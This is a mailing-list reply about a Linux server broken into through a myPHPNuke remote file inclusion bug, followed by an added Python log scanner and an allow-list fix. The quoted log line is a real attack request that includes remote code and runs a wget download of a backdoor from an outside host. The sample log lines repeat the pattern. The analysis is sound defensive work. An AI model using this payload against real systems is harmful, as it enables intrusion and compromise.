On Mon, Jan 19, 2004 at 14:40:12 +0100, Csan wrote:
> One of my servers has been cracked into and I am looking for the weak
> spots of the system and also looking for ways to lock the secholes I might
> (also) have. The Linux box is an up-to-date woody (incl. security
> updates).
>
> My first question is how come such a thing worked on my box?
Apparently you installed PHP code that had a security vulnerability.

> "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://geocities.yahoo.com.br/dcha0s/cse.gif?&cmd=id;uname%20-a;pwd;cd%20/;cd%20tmp;wget%20www.fdlsk8.hpg.ig.com.br/telnetd; HTTP/1.1" 200 7047

This appears to be exploiting the vulnerability described in
http://www.secunia.com/advisories/9721/ ("myPHPNuke Arbitrary File
Inclusion Vulnerability", 2003-09-12).

> (Debian unstable has version 0.732-4.2, so the first thing to do is to
> backport the unstable version. Or is it rather a php bug?

No, it's a myPHPNuke bug; it doesn't do enough input validation (see
http://www.tldp.org/HOWTO/Secure-Programs-HOWTO/input.html).

HTH,
Ray

--
[...] computer source code, though unintelligible to many, is the
preferred method of communication among computer programmers.
http://pacer.ca6.uscourts.gov/cgi-bin/getopn.pl?OPINION=00a0117p.06
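As an added example (not code from this thread or from myPHPNuke), written in Python rather than PHP: it shows the two sides of the input-validation point Ray makes, a scan of access-log lines for a parameter whose value is a URL, which is what let the quoted request make `displayCategory.php` include remote code, and the allow-list lookup the application should have done before passing `basepath` to `include()`. The log lines, the `attacker.example` host, and `ALLOWED_BASEPATHS` are constructed for the example.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed sample access-log lines (Apache "combined" format); the client
# addresses and the attacker.example host are placeholders, not values from the mail.
SAMPLE_LOG = [
    '10.0.0.5 - - [19/Jan/2004:14:02:11 +0100] "GET /modules/My_eGallery/public/displayCategory.php?basepath=modules/My_eGallery&cat=3 HTTP/1.1" 200 7047',
    '10.0.0.9 - - [19/Jan/2004:14:03:42 +0100] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://attacker.example/x.gif?&cmd=id HTTP/1.1" 200 7047',
    '10.0.0.9 - - [19/Jan/2004:14:04:01 +0100] "GET /modules/My_eGallery/public/displayCategory.php?basepath=%2568ttp%253A%252F%252Fattacker.example%252Fx.gif HTTP/1.1" 200 512',
]

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+"')
# A parameter value that begins with a URL scheme (or a PHP stream wrapper) is
# the tell-tale of a remote-file-inclusion attempt against an include() built
# from user input, the class of bug the Secunia advisory describes.
REMOTE_RE = re.compile(r'^(?:[a-z][a-z0-9+.-]*://|php:|data:)', re.I)

def find_rfi_attempts(lines):
    """Return (parameter, decoded value) pairs whose value points at a remote resource."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        # Split on the first '?' by hand: urlsplit would read a leading '//x' as a host.
        _path, _, query = m.group("uri").partition("?")
        for name, values in parse_qs(query, keep_blank_values=True).items():
            for value in values:
                # parse_qs decodes once; a second unquote exposes double-encoded schemes.
                decoded = unquote(value)
                if REMOTE_RE.match(decoded):
                    hits.append((name, decoded))
    return hits

# The application-side fix: never hand the raw parameter to include(); resolve it
# against an allow-list of known module directories instead.
# ALLOWED_BASEPATHS is an assumed example set, not myPHPNuke's configuration.
ALLOWED_BASEPATHS = frozenset({"modules/My_eGallery", "modules/My_eGallery/themes/default"})

def safe_basepath(value, allowed=ALLOWED_BASEPATHS):
    """Return the validated relative path, or None when the value is not on the allow-list."""
    decoded = unquote(value)
    return decoded if decoded in allowed else None

if __name__ == "__main__":
    for name, value in find_rfi_attempts(SAMPLE_LOG):
        print(f"possible RFI attempt: {name}={value}")
    print(safe_basepath("modules/My_eGallery"), safe_basepath("http://attacker.example/x.gif?"))
```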